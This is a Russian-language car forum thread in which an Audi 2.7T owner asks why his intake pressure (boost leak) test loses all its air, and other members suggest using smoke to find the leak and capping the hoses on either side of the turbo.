+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 11

Тема: Попытка опрессовки,что не так?

GTI-Racing NAGROM85 is on a distinguished road Аватар для NAGROM85
    Машина
    AUDI 2.7T 300hp

Попытка опрессовки,что не так?

В общем начитавшись форумов и прочего решил сделать опрессовку,т.к. ошибки по смеси,и опрессовка было заданием №1.
    Говорю сразу что знаю что тем таких очень много,исчитал ауди и пассат клубы,там больше половины ссылок нерабочие,а те что рабочие,в них кричат что тема исстоптана и дают те самые битые ссылки,и плавно переходят в обсуждение у кого писька больше....
    -купил фильтр от волги,чуть больше метра шланг,переходник на колесо и хомуты и начал пробовать,на ауди клубе скачал zip в котором написано просто подсоединяем фильтр к патрубку что у воздухана,шланг к запаске в которой 1.5 бара давление,спускаем воздух в систему,пережимаем шланг и слушаем.
    я так и сделал,в результате весь воздух куда то ушел.не создав никакого давления в системе,что не так?и никакого шума я не услышал.И так несколько раз подряд.потом дуть начал друг,который надувом грелки рвет,и то же самое,воздух куда то уходит без напряга.
    в тех же форумах я прочитал про то.что нужно заткнуть патрубок вкг,заглушил,и ситуация та же,потом взял с патрубка снял все(байпасс,грибок,и все остальное,вставил отвертки,захомутал и дул,без всяких изменений,давление в системе не создается,и воздух самотеком куда то уходит.

и никакого сизого дыма при заводке(типа если не заглушить вкг,то масло нагонит в камеры сгорания)
    поверьте,много читал про эту элементарную процедуру,но как факт что то упускаю,если будете тыкать носом в ссылки,проверьте предварительно их работоспособность и информативность,а лучше на моих картинках нарисуйте что заткнуть или где еще ошибаюсь.
    спасибо.

GTI-Racing dus72 is on a distinguished road Аватар для dus72
    Машина
    AUDI S4 B6 2.7t
    просто где огромная дыра вот и все
    снял проверил - заменил - все по порядку
    только так

GTI-Racing link-man is on a distinguished road Аватар для link-man
    Машина
    5GTI DSG '08
    Там дыра значит нереальная!!!
    Попробуй сначала сигарету или две туда "вкурить" и потом давлением, увидишь от куда дым повалит локализуешь место дырки...

Добавлено через 1 минуту
    и затыкать ничего не надо, что бы проверить весь контур!!!
    Последний раз редактировалось link-man; 14.07.2011 в 11:28. Причина: Добавлено сообщение

Машина
    AUDI 2.7T 300hp
    ааа,так значит делаю все правильно,просто значит дыра гдето на кишке силиконовой в районе ближе к турбе,т.к.все патрубки из нее исходящие я заткнул,буду курить в силикон,а потом давить запаской.

GTI-Racing knyaz is on a distinguished road Аватар для knyaz
    Машина
    Golf 4 1,8t
    сама турбина может пропускать... я поресовывал куском(от турбины до дросселя), снимал патрупок,что после турбины,ставил в него заглушку, глушил у дроселя и подавал с колеса давление через трубку от 75 клапана...тогда не пропускало))

Машина
    AUDI 2.7T 300hp
    Цитата Сообщение от knyaz Посмотреть сообщение
    сама турбина может пропускать... я поресовывал куском(от турбины до дросселя), снимал патрупок,что после турбины,ставил в него заглушку, глушил у дроселя и подавал с колеса давление через трубку от 75 клапана...тогда не пропускало))
    вот и я о чем, может все таки не дыра,а через турбу выходит воздух?потому что давит по датчику до 1кг,а начались проблемы со смесью только после прошивки,думаю все таки прошивка кривая.просто прежде чем перешиваться,думал все таки проверить герметичность впуска,но не удается.

GTI-Racing link-man is on a distinguished road Аватар для link-man
    Машина
    5GTI DSG '08
    как правило да, лопается сама "кишка" к турбине! но бывает еще и дырка в интеркуллере!

GTI-Racing mas1er is on a distinguished road Аватар для mas1er
    Машина
    mk4
    Цитата Сообщение от link-man Посмотреть сообщение
    как правило да, лопается сама "кишка" к турбине! но бывает еще и дырка в интеркуллере!
    что за кишка? это где?
    '02mk4 GTi st1 * Forge007 DV * WEITEC coilovers * 312 * R32 sway bar продан
    '12mk6 GTi MT APR * Carbonio intake * Neuspeed Turbo Outlet pipe * Eibach Sportline

GTI-Racing vasya555 is on a distinguished road Аватар для vasya555
    Машина
    Jetta 2.0TSI DSG 2008г 210л.с
    Цитата Сообщение от NAGROM85 Посмотреть сообщение
    вот и я о чем, может все таки не дыра,а через турбу выходит воздух?потому что давит по датчику до 1кг,а начались проблемы со смесью только после прошивки,думаю все таки прошивка кривая.просто прежде чем перешиваться,думал все таки проверить герметичность впуска,но не удается.
    с турбиной опресовку ни кто не делает,турбина пропускает воздух через стопорные кольца,это нормально,снмимай патрубок с турбины и с заслонки,одну сторону заглуши,а с другой ваткни фильтр и качай в него,тогда ты опресуешь все как надо

Машина
    AUDI 2.7T 300hp
    Цитата Сообщение от mas1er Посмотреть сообщение
    что за кишка? это где?
    кишка-это патрубок к турбине от воздушного фильтра,туда еще байпасс,грибок и клапан 75 крепяться

Добавлено через 8 минут
    Цитата Сообщение от vasya555 Посмотреть сообщение
    с турбиной опресовку ни кто не делает,турбина пропускает воздух через стопорные кольца,это нормально,снмимай патрубок с турбины и с заслонки,одну сторону заглуши,а с другой ваткни фильтр и качай в него,тогда ты опресуешь все как надо
    а какой патрубок снимать от турбины?дуть буду в тот что возле дроселя хомутится,а глушить какой?
    Последний раз редактировалось NAGROM85; 14.07.2011 в 20:24. Причина: Добавлено сообщение

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя